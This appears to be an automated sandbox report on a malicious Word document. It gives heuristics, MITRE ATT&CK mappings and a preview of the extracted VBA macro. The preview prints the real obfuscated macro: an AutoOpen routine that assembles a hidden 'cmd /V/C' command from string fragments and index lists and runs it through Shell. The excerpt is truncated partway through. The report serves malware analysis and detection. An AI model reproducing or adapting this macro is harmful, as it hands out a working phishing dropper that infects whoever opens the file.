MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute a command, likely to download and run a second-stage payload. The ClamAV detection and the presence of a legacy WordBasic marker further indicate malicious intent.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6752193-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6752193-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5792 bytes |
SHA-256: f790331859ee4d156c568ea7eac21df0e8e363fa6a6988a8071486d90eec217f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DusqruXGiRh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate 342903035
AppActivate UcpRY
AppActivate bcjshB
AppActivate CDbl(ZjPiS)
Shell@ CVar("cm") + HFwcCQPnK + cVKPRTao + VWuoAzvSiR + VmbbjTFLYim + BMRMpufzooz + iaDLjRrA + JNXwwYfYfcNkUP, 184868679 - 184868679
AppActivate Oct(liuwDr * HpAlr)
AppActivate CInt(51)
AppActivate ljBns
End Sub
Attribute VB_Name = "lqwuoNztFoH"
Function VWuoAzvSiR()
On Error Resume Next
AppActivate iwjzuY
AppActivate 31
qHrrYiiSY = "d " + "/V/C" + CStr(Chr(zzdUEvJl + thUGYjnoZ + 34 + rwiNXCH + jDYDozjGb)) + "set " + "pPr=MOAN" + "tGXcfYQDJ" + "ZlJ"
AppActivate CDate(8018)
AppActivate 11
AppActivate KpTSY
oHztLqIqO = "qsHzDVpR" + "-8Ix'" + "$iS{@+vC2o" + "=/(W" + "Fbj" + "dh);gekU" + "naru}" + "P7:E, "
AppActivate CSng(2)
AppActivate Sqr(2007 / lKRMQ - oCEwMo / jfQiS)
AppActivate ChrB(56968 - Ubkaw)
LEZTtph = "wy0." + "\m&&f" + "or " + "%D in " + "(22"
AppActivate mdvmR
AppActivate Round(zMTjz)
iozQNjMDza = ";" + "38;65;51;" + "56;17;4" + "7;51;14" + ";14" + ";64;29" + ";55;21;2" + "1;"
AppActivate 3752
AppActivate Round(97)
oTkFLv = "39" + ";54;51;6" + "5;24" + ";38;44" + ";4" + "5;" + "51;" + "7;4;6" + "4;3;51;4;"
VWuoAzvSiR = qHrrYiiSY + oHztLqIqO + LEZTtph + iozQNjMDza + oTkFLv
AppActivate Log(pqcpjt)
AppActivate nHzTiY
AppActivate 9881
End Function
Function VmbbjTFLYim()
On Error Resume Next
AppActivate Fix(pLwzhO + 17493)
AppActivate ChrB(99577 * rmswv)
KwvcYdLF = "68;4" + "2;51" + ";44;36;14" + ";30;51;54" + ";4;49;2" + "9;15;" + "62" + ";17;39" + ";28;4" + "7;4;4;22" + ";61;40;40" + ";35"
AppActivate diuwRw
AppActivate 950
AppActivate Hex(7)
vlzIkWVtUs = ";46;4" + ";38;" + "50;4;" + "68;54" + ";14;40"
AppActivate Atn(302424527)
AppActivate Fix(tVfWu)
AppActivate Sin(94)
uiBiPnYdJ = ";55;70;66;" + "10;33" + ";47;4;" + "4;22;6" + "1;40;40" + ";35" + ";3"
AppActivate CSng(94)
AppActivate CSng(17129 * 3311 / ujXjsJ + jTlwC)
KiXPKjXjpX = "0" + ";7;30;" + "38;57;17" + ";51;54" + ";4;51;56;" + "22" + ";56;30"
AppActivate Int(32)
AppActivate VwWmBY
AppActivate Cos(470)
wQdwikw = ";1" + "7" + ";51;17" + ";" + "68;7;38;70" + ";40;16;6" + ";53;" + "57;6"
AppActivate LZhETv
AppActivate ChrB(NjQNqa)
ucjqQUMlZ = ";16;3" + "3;47;" + "4" + ";4;22;61;" + "40;40;57" + ";54;7;14;" + "51;44;57;" + "46;17;22" + ";30;"
AppActivate ChrB(wmPdWn)
AppActivate ChrB(YcwYa)
AppActivate 273
nwdKLpmv = "7;51;68;7" + ";3" + "8;70;4" + "0;" + "25;67;46;" + "33;47;4;4" + ";22;" + "61;40;40" + ";" + "35;55;1" + "4;30;57;5" + "4"
AppActivate lOVor
AppActivate AzCXG
PQXuffbKNz = ";55;17;" + "68;7;3" + "8;70;40;" + "5;2" + "5;3" + "6;38;38" + ";2" + "6;33;47;4;"
AppActivate Round(pPDKV)
AppActivate bnRocO
dqGPcmvUvY = "4;2" + "2;61;4" + "0;40;4;" + "47;" + "51;17;"
AppActivate nzuJt
AppActivate Sgn(8)
AppActivate Sgn(4092835)
UZIoPMj = "3" + "0;" + "14;35;" + "51;56;55" + ";70;51" + ";56" + ";30" + ";7;55;54;" + "51;5" + "5;50;14;"
AppActivate CDate(5)
AppActivate Round(nMJmG)
tZhGzfHZ = "51;68;7;" + "38;70;" + "40;4" + ";44;" + "28;" + "68" + ";31;" + "22;14;30;" + "4" + ";41;28" + ";33;"
AppActivate 56374874
AppActivate 793
jUiXSkPVTs = "28;48;49" + ";29;42;6;" + "62;6" + "4;39;6" + "4;28;" + "60;" + "37;60;2" + "8;49;29;" + "23" + ";42" + ";30;3"
AppActivate Log(7)
AppActivate Log(58177 + HOtNIC + 34599 + YqdaD)
AppActivate Chr(69867 * CzoDba + CIUllS - ckzqj)
LCBYkn = "9;29" + ";51;54;" + "35;61;4;5" + "1;70;22;" + "34;28;69;" + "28;34;29;4" + "2;6;62" + ";34;2" + "8;68;51" + ";27" + ";51" + ";28;49;8;" + "38;56;51;5"
VmbbjTFLYim = KwvcYdLF + vlzIkWVtUs + uiBiPnYdJ + KiXPKjXjpX + wQdwikw + ucjqQUMlZ + nwdKLpmv + PQXuffbKNz + dqGPcmvUvY + UZIoPMj + tZhGzfHZ + jU
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.